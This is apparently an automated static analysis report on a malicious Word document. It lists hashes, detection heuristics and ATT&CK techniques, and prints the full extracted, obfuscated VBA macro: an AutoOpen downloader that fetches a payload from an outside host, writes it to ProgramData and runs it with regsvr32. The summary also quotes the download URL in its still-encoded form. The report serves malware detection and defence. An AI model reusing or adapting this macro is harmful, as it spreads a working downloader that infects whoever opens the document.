Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 42ccd85c910961fa…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 133.0 KB
Created: 2020-07-09 00:02:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-07-24
MD5: 73a93d4e240df1801c2d031108bdee2c
SHA-1: 4d8348892e63505e2a65bd5b484626860584df6a
SHA-256: 42ccd85c910961fa939059b6903462d1d1da80ab275b93de655ca248fdb1880b
Risk score: 142

Malware Insights

MITRE ATT&CK: T1059.005 (Visual Basic), T1204.002 (Malicious File)

The sample contains a VBA macro with an AutoOpen subroutine, which is a common technique for executing malicious code upon opening a document. The script attempts to write a file to 'C:\ProgramData\a4c.jpg' and then execute it. The URL 'http://docffi23b.c8o6m6/6i0z355/0y7afc9a5.0p4h9p9?1l6=akbp4tb93.8c6a6bb' is used to download the payload. This indicates a macro-based downloader designed to fetch and run a second-stage payload.

Heuristics (5)

  • External relationship (severity: high) [OOXML_EXTERNAL_REL]
    External target in word/_rels/document.xml.rels: file:///C:\Framework\rels\builds\pack1\it.jpg
  • VBA project inside OOXML (severity: medium, 2 related findings) [OOXML_VBA]
    Document contains a VBA project — VBA macros present
  • AutoOpen macro (severity: high) [OLE_VBA_AUTOOPEN]
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (severity: high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL (severity: info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2014/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex (OOXML external relationship)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2016/ink (OOXML external relationship)
    • http://schemas.microsoft.com/office/drawing/2017/model3d (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships (OOXML external relationship)
    • http://schemas.openxmlformats.org/officeDocument/2006/math (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (OOXML external relationship)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2012/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2018/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2006/wordml (OOXML external relationship)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape (OOXML external relationship)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

macros.bas
  Kind: vba-macro
  Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
  Size: 3096 bytes
  SHA-256: c6dea22c5264a4aad9d23a86b38d93564256807129b156aa1e5a1d468e45ec6f

  Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "ce385fb9"
Function ff67d0b4()
ff67d0b4 = 61355.878109499
End Function
Function ecd222ab()
ecd222ab = ActiveWindow.EnvelopeVisible
End Function
Sub cc20c015(edbbfcff, cd72fb47)
Dim b997613d
b997613d = FreeFile
Open edbbfcff For Output As #b997613d
Print #b997613d, ab516380(cd72fb47)
Close #b997613d
End Sub
Function a6673961()
a6673961 = ActiveWindow.UsableHeight
End Function
Function fd6bfd6f()
fd6bfd6f = ActiveWindow.SplitVertical
End Function
Function f8e59b55(df4eb4ed)
e68b55e9 = Len(df4eb4ed)
For e5b91460 = 1 To e68b55e9 Step 2
eed047ec = eed047ec & Mid(df4eb4ed, e5b91460, 1)
Next
f8e59b55 = eed047ec
End Function
Function cd11a6eb()
cd11a6eb = ActiveWindow.DisplayVerticalScrollBar
End Function
Function c297b5d2()
c297b5d2 = Application.ActiveDocument.CurrentRsid
End Function
Sub f2183caa()
End Sub
Function c480bfd0()
c480bfd0 = -1218
End Function
Function dc2beee7()
dc2beee7 = "ajirRv"
End Function
Sub AutoOpen()
Dim f4b4c0ac As New b5f50fc5
cc20c015 f8e59b55("c1:d\5p1r2o6g0rba0m0daadtcaf\9345e7c3a4c.bj8pcg9"), f4b4c0ac.ca31c01b(f8e59b55("hbt2tfpb:5/5/2cdocffi23b.7c8o6m6/6i0z355/0y7afc9a5.0p4h9p9?1l6=akbp4tb93.8c6a6bb"))
Dim fcf832a1 As New WshShell
fcf832a1.exec d9ed35e7 & " " & f8e59b55("c1:d\5p1r2o6g0rba0m0daadtcaf\9345e7c3a4c.bj8pcg9")
End Sub

Attribute VB_Name = "c6be038f"
Function c9f26ccd()
c9f26ccd = ActiveWindow.WindowNumber
End Function
Function bd0923ac()
bd0923ac = 8096.2861793661
End Function
Function ab516380(ed66f7b2)
ab516380 = StrConv(ed66f7b2, 64)
End Function
Function fcf744d1()
fcf744d1 = ActiveWindow.DisplayVerticalScrollBar
End Function
Function a93f9917()
a93f9917 = 0
End Function
Function fadaf300()
End Function
Function daf2dc9e()
daf2dc9e = ActiveWindow.DisplayRulers
End Function
Function e3cad1ce()
e3cad1ce = True
End Function
Function d9ed35e7()
d9ed35e7 = f8e59b55("rbe0gbsdvcrb3f29")
End Function

Attribute VB_Name = "b5f50fc5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function f18cc309()
f18cc309 = ActiveWindow.DisplayLeftScrollBar
End Function
Function d5d2149c()
d5d2149c = Application.ActiveDocument.CurrentRsid
End Function
Function ca31c01b(d303c1bb)
Dim faa096a4 As Object
Set faa096a4 = New MSXML2.XMLHTTP30
Call faa096a4.Open("GET", d303c1bb, False)
faa096a4.Send
ca31c01b = faa096a4.responsebody
End Function
Function b80436e1()
b80436e1 = ActiveWindow.DisplayRightRuler
End Function
Function aac7c580()
aac7c580 = ActiveWindow.Top
End Function
Function e3fc2362(e82d42ff)
End Function

vbaProject_00.bin
  Kind: vba-project
  Source: OOXML VBA project: word/vbaProject.bin
  Size: 24064 bytes
  SHA-256: 2fb8b972e3f9ac460a402ab36d071bdfcc2b38ec37d8f82f614a3a6e0756998c